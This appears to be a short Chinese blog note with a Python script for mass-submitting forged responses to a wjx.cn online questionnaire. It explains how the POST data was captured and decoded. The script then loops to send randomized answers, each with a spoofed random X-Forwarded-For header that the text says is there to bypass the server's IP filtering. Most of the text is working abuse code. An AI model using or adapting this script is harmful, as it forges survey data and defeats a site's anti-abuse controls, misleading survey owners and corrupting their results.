思路
- 分析页面结构, 问题标号:
q+第几题, 问题选项:q+第几题+_第几个选项.
对一次提交进行抓包, 抓取post数据包.
对submidata进行解码得到如下.
明显看出是题号$选项号}组成的.写
python脚本构造post请求.利用X-Forwarded-For绕过服务器IP地址过滤.
import requests
from time import *
from random import randint
for i in range(10):
header = {
'Host': 'www.wjx.cn',
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:63.0) Gecko/20100101 Firefox/63.0',
'X-Forwarded-For': str(randint(1, 255)) + '.' + str(randint(1, 255)) + '.' + str(randint(1, 255)) + '.' + str(
randint(1, 255)),
'Referer': 'https://www.wjx.cn###.aspx',
'Cookie': 'acw_tc=2f624a1f154##',
}
print("第 " + str(i) + " 提交" + " Using IP:" + header['X-Forwarded-For'] + ' to compalte this Q.')
data = "submitdata=1$%s}2$%s}3$%s}4$%s}5$%s}6$%s}7$%s}8$3}9$-3}10$-3}11$%s}12$%s}13$%s}14$%s}15$%s}16$%s}17$%s}18$%s" % (
str(randint(1, 7)), str(randint(1, 9)), str(randint(1, 4)), str(randint(1, 3)), str(randint(1, 4)),
str(randint(1, 3)), str(randint(1, 3)), str(randint(1, 2)), str(randint(1, 2)), str(randint(1, 4)),
str(randint(1, 2)), str(randint(1, 2)), str(randint(1, 3)), str(randint(1, 2)), str(randint(1, 3)))
url = 'https://www.wjx.cn/joinnew/processjq.ashx?curid=34131883&starttime=2019%2F1%2F25%2021%3A37%3A12&source=directphone&submittype=1&ktimes=213&hlv=1&rn=1034449004.44465961&t=1548423507485&jqnonce=c5825f6b-67d7-40c8-ba2e-e1ffb82c4642&jqsign=%606%3B16e5a.54g4.73%60%3B.ab1f.f2eea%3B1%607571'
r = requests.post(url, data=data, headers=header)
# print(r)
print("Complate.")